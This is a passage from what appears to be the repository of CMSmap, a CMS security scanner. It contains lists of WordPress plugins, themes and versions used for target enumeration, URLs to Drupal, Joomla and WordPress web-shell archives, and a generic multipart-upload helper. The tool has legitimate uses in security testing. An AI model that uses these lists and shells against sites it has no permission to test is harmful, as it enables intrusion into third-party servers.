ajax-store-locator-wordpress_0 16 | ajaxgallery 17 | akismet 18 | alert-before-your-post 19 | all-in-one-wp-security-and-firewall 20 | all-video-gallery 21 | allwebmenus-wordpress-menu-plugin 22 | annonces 23 | announcement-and-vertical-scroll-news 24 | asset-manager 25 | audio 26 | auto-attachments 27 | backwpup 28 | bbpress 29 | bezahlcode-generator 30 | booking 31 | cac-featured-content 32 | catalog 33 | category-grid-view-gallery 34 | category-list-portfolio-page 35 | cevhershare 36 | cforms 37 | cforms2 38 | cimy-counter 39 | clickdesk-live-support-chat 40 | cm-download-manager 41 | cms-pack 42 | comicpress-manager 43 | comment-rating 44 | community-events 45 | complete-gallery-manager 46 | contact-form-wordpress 47 | contus-hd-flv-player 48 | contus-video-gallery 49 | copyright-licensing-tools 50 | count-per-day 51 | couponer 52 | cpl 53 | crawlrate-tracker 54 | custom-content-type-manager 55 | daily-maui-photo-widget 56 | db-backup 57 | disclosure-policy-plugin 58 | dm-albums 59 | dmsguestbook 60 | downloads-manager 61 | dp-thumbnail 62 | drag-drop-file-uploader 63 | dzs-videogallery 64 | easy-contact-form-lite 65 | easy-contact-forms-exporter 66 | editormonkey 67 | evarisk 68 | event-registration 69 | eventify 70 | extend-wordpress 71 | facebook-opengraph-meta-plugin 72 | fbpromotions 73 | fcchat 74 | feature-slideshow 75 | featurific-for-wordpress 76 | feedlist 77 | fgallery 78 | file-groups 79 | filedownload 80 | firestats 81 | flash-album-gallery 82 | flexible-custom-post-type 83 | font-uploader 84 | formcraft 85 | forum-server 86 | foxypress 87 | front-end-upload 88 | front-file-manager 89 | fs-real-estate-plugin 90 | gallery-images 91 | gallery-plugin 92 | gd-star-rating 93 | global-content-blocks 94 | google-document-embedder 95 | google-mp3-audio-player 96 | grapefile 97 | hd-webplayer 98 | html5avmanager 99 | igit-posts-slider-widget 100 | image-gallery-with-slideshow 101 | inboundio-marketing 102 | inline-gallery 103 | ip-logger 104 | is-human 105 | islidex 106 | iwant-one-ihave-one 107 | jetpack 108 | jquery-mega-menu 109 | jrss-widget 110 | js-appointment 111 | kino-gallery 112 | kish-guest-posting 113 | knr-author-list-widget 114 | lanoba-social-plugin 115 | lazy-seo 116 | lazyest-gallery 117 | leaguemanager 118 | like-dislike-counter-for-posts-pages-and-comments 119 | link-library 120 | lisl-last-image-slider 121 | livesig 122 | login-lockdown 123 | mac-dock-gallery 124 | mailz 125 | media-library-categories 126 | meenews 127 | mingle-forum 128 | mm-forms-community 129 | myflash 130 | mystat 131 | nextgen-gallery 132 | nextgen-smooth-gallery 133 | odihost-newsletter-plugin 134 | old-post-spinner 135 | omni-secure-files 136 | oqey-gallery 137 | oqey-headers 138 | page-flip-image-gallery 139 | paid-downloads 140 | photoracer 141 | photosmash-galleries 142 | php_speedy_wp 143 | pica-photo-gallery 144 | pictpress 145 | placester 146 | plugin-dir 147 | plugin-newsletter 148 | post-highlights 149 | premium_gallery_manager 150 | pretty-link 151 | profiles 152 | proplayer 153 | pure-html 154 | radykal-fancy-gallery 155 | rating-widget 156 | rbxgallery 157 | really-easy-slider 158 | recipe 159 | reciply 160 | reflex-gallery 161 | rekt-slideshow 162 | related-sites 163 | relocate-upload 164 | rent-a-car 165 | resume-submissions-job-postings 166 | ripe-hd-player 167 | rss-feed-reader 168 | scormcloud 169 | search-autocomplete 170 | sendit 171 | seo-automatic-seo-tools 172 | sermon-browser 173 | sexy-contact-form 174 | sfbrowser 175 | sh-slideshow 176 | si-contact-form 177 | simple-download-button-shortcode 178 | skysa-official 179 | sniplets 180 | social-discussions 181 | social-slider-2 182 | sodahead-polls 183 | sp-client-document-manager 184 | spicy-blogroll 185 | spider-event-calendar 186 | st_newsletter 187 | statpress 188 | stats 189 | store-locator-le 190 | subscribe-to-comments 191 | tagninja 192 | the-welcomizer 193 | thecartpress 194 | thinkun-remind 195 | tinymce-thumbnail-gallery 196 | topquark 197 | tune-library 198 | ucan-post 199 | ungallery 200 | uploader 201 | uploads 202 | upm-polls 203 | user-avatar 204 | user-meta 205 | verve-meta-boxes 206 | videowhisper-live-streaming-integration 207 | videowhisper-video-presentation 208 | vk-gallery 209 | vodpod-video-gallery 210 | wassup 211 | webinar_plugin 212 | website-faq 213 | wordpress-donation-plugin-with-goals-and-paypal-ipn-by-nonprofitcmsorg 214 | wordpress-processing-embed 215 | wordtube 216 | wp-adserve 217 | wp-audio-gallery-playlist 218 | wp-automatic 219 | wp-autoyoutube 220 | wp-bannerize 221 | wp-cal 222 | wp-content 223 | wp-cumulus 224 | wp-custom-pages 225 | wp-db-backup 226 | wp-ds-faq 227 | wp-e-commerce 228 | wp-easycart 229 | wp-featured-post-with-thumbnail 230 | wp-filebase 231 | wp-filemanager 232 | wp-footnotes 233 | wp-forum 234 | wp-glossary 235 | wp-gpx-maps 236 | wp-lytebox 237 | wp-marketplace 238 | wp-menu-creator 239 | wp-people 240 | wp-property 241 | wp-publication-archive 242 | wp-realty 243 | wp-safe-search 244 | wp-shopping-cart 245 | wp-spamfree 246 | wp-starsratebox 247 | wp-stats-dashboard 248 | wp-support-plus-responsive-ticket-system 249 | wp-survey-and-quiz-tool 250 | wp-symposium 251 | wp-syntax 252 | wp-table 253 | wp-twitter-feed 254 | wp-whois 255 | wpSS 256 | wpeasystats 257 | wpforum 258 | wpmarketplace 259 | wpstorecart 260 | wptouch 261 | x7host-videox7-ugc-plugin 262 | yolink-search 263 | yt-audio-streaming-audio-from-youtube 264 | zingiri-web-shop 265 | zotpress 266 | zotpressinboundio-marketing 267 | -------------------------------------------------------------------------------- /data/wp_themes_small.txt: -------------------------------------------------------------------------------- 1 | Avada 2 | Centum 3 | Divi 4 | IncredibleWP 5 | THEME 6 | ThinkResponsive 7 | acento 8 | agritourismo-theme 9 | amplus 10 | archin 11 | area53 12 | beach_apollo 13 | bordeaux-theme 14 | bulteno-theme 15 | cuckootap 16 | curvo 17 | dandelion 18 | default 19 | designfolio-plus 20 | diary 21 | dimension 22 | euclid 23 | gazette 24 | highlight 25 | kernel-theme 26 | limon 27 | linenity 28 | livewire-edition 29 | make_a_statement 30 | medicate 31 | oxygen-theme 32 | parallax 33 | persuasion 34 | radial-theme 35 | rayoflight-theme 36 | reganto-theme 37 | rockstar-theme 38 | saico 39 | striking_r 40 | switchblade 41 | -------------------------------------------------------------------------------- /data/wp_versions.txt: -------------------------------------------------------------------------------- 1 | 4.1.1 2 | 4.1 3 | 4.0.1 4 | 4.0 5 | 3.9.3 6 | 3.9.2 7 | 3.9.1 8 | 3.9 9 | 3.8.3 10 | 3.8.2 11 | 3.8.1 12 | 3.8 13 | 3.7.1 14 | 3.7 15 | 3.6.1 16 | 3.6 17 | 3.5.2 18 | 3.5.1 19 | 3.5 20 | 3.4.2 21 | 3.4.1 22 | 3.4 23 | 3.3.3 24 | 3.3.2 25 | 3.3.1 26 | 3.3 27 | 3.2.1 28 | 3.2 29 | 3.1.4 30 | 3.1.3 31 | 3.1.2 32 | 3.1.1 33 | 3.1 34 | 3.0.6 35 | 3.0.5 36 | 3.0.4 37 | 3.0.3 38 | 3.0.2 39 | 3.0.1 40 | 3 41 | 2.9.2 42 | 2.9.1 43 | 2.9 44 | 2.8.6 45 | 2.8.5 46 | 2.8.4 47 | 2.8.3 48 | 2.8.2 49 | 2.8.1 50 | 2.8 51 | 2.7.1 52 | 2.7 53 | 2.6.5 54 | 2.6.3 55 | 2.6.2 56 | 2.6.1 57 | 2.6 58 | 2.5.1 59 | 2.5 60 | 2.3.3 61 | 2.3.2 62 | 2.3.1 63 | 2.3 64 | 2.2.3 65 | 2.2.2 66 | 2.2.1 67 | 2.2 68 | 2.1.3 69 | 2.1.2 70 | 2.1.1 71 | 2.1 72 | 2.0.11 73 | 2.0.10 74 | 2.0.9 75 | 2.0.8 76 | 2.0.7 77 | 2.0.6 78 | 2.0.5 79 | 2.0.4 80 | 2.0.3 81 | 2.0.2 82 | 2.0.1 83 | 2 84 | 1.5.2 85 | 1.5.1.3 86 | 1.5.1.2 87 | 1.5.1 88 | 1.5 89 | 1.2.2 90 | 1.2.1 91 | 1.2 92 | 1.0.2 93 | 1.0.1 94 | 1 95 | 0.72 96 | 0.711 97 | 0.71 98 | 0.7 -------------------------------------------------------------------------------- /shell/dru-shell.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The404Hacking/CMSmap/ee8fa1b3ab5e86e583ad61ee993ca428699723d7/shell/dru-shell.zip -------------------------------------------------------------------------------- /shell/joo-shell.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The404Hacking/CMSmap/ee8fa1b3ab5e86e583ad61ee993ca428699723d7/shell/joo-shell.zip -------------------------------------------------------------------------------- /shell/wp-shell.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The404Hacking/CMSmap/ee8fa1b3ab5e86e583ad61ee993ca428699723d7/shell/wp-shell.zip -------------------------------------------------------------------------------- /thirdparty/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The404Hacking/CMSmap/ee8fa1b3ab5e86e583ad61ee993ca428699723d7/thirdparty/__init__.py -------------------------------------------------------------------------------- /thirdparty/multipart/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The404Hacking/CMSmap/ee8fa1b3ab5e86e583ad61ee993ca428699723d7/thirdparty/multipart/__init__.py -------------------------------------------------------------------------------- /thirdparty/multipart/multipartpost.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #### 4 | # 02/2006 Will Holcomb 5 | # 6 | # This library is free software; you can redistribute it and/or 7 | # modify it under the terms of the GNU Lesser General Public 8 | # License as published by the Free Software Foundation; either 9 | # version 2.1 of the License, or (at your option) any later version. 10 | # 11 | # This library is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 14 | # Lesser General Public License for more details. 15 | # 16 | 17 | import urllib 18 | import urllib2 19 | import mimetools, mimetypes 20 | import os, stat 21 | import sys 22 | 23 | class Callable: 24 | def __init__(self, anycallable): 25 | self.__call__ = anycallable 26 | 27 | # Controls how sequences are uncoded. If true, elements may be given multiple values by 28 | # assigning a sequence. 29 | doseq = 1 30 | 31 | class MultipartPostHandler(urllib2.BaseHandler): 32 | handler_order = urllib2.HTTPHandler.handler_order - 10 # needs to run first 33 | 34 | def http_request(self, request): 35 | data = request.get_data() 36 | if data is not None and type(data) != str: 37 | v_files = [] 38 | v_vars = [] 39 | try: 40 | for(key, value) in data.items(): 41 | if type(value) == file: 42 | v_files.append((key, value)) 43 | else: 44 | v_vars.append((key, value)) 45 | except TypeError: 46 | systype, value, traceback = sys.exc_info() 47 | raise TypeError, "not a valid non-string sequence or mapping object", traceback 48 | 49 | if len(v_files) == 0: 50 | data = urllib.urlencode(v_vars, doseq) 51 | else: 52 | boundary, data = self.multipart_encode(v_vars, v_files) 53 | contenttype = 'multipart/form-data; boundary=%s' % boundary 54 | if(request.has_header('Content-Type') 55 | and request.get_header('Content-Type').find('multipart/form-data') != 0): 56 | print "Replacing %s with %s" % (request.get_header('content-type'), 'multipart/form-data') 57 | request.add_unredirected_header('Content-Type', contenttype) 58 | 59 | request.add_data(data) 60 | return request 61 | 62 | def multipart_encode(vars, files, boundary = None, buffer = None): 63 | if boundary is None: 64 | boundary = mimetools.choose_boundary() 65 | if buffer is None: 66 | buffer = '' 67 | for(key, value) in vars: 68 | buffer += '--%s\r\n' % boundary 69 | buffer += 'Content-Disposition: form-data; name="%s"' % key 70 | buffer += '\r\n\r\n' + value + '\r\n' 71 | for(key, fd) in files: 72 | file_size = os.fstat(fd.fileno())[stat.ST_SIZE] 73 | filename = fd.name.split('/')[-1] 74 | contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' 75 | buffer += '--%s\r\n' % boundary 76 | buffer += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename) 77 | buffer += 'Content-Type: %s\r\n' % contenttype 78 | # buffer += 'Content-Length: %s\r\n' % file_size 79 | fd.seek(0) 80 | buffer += '\r\n' + fd.read() + '\r\n' 81 | buffer += '--%s--\r\n\r\n' % boundary 82 | return boundary, buffer 83 | multipart_encode = Callable(multipart_encode) 84 | 85 | https_request = http_request 86 | --------------------------------------------------------------------------------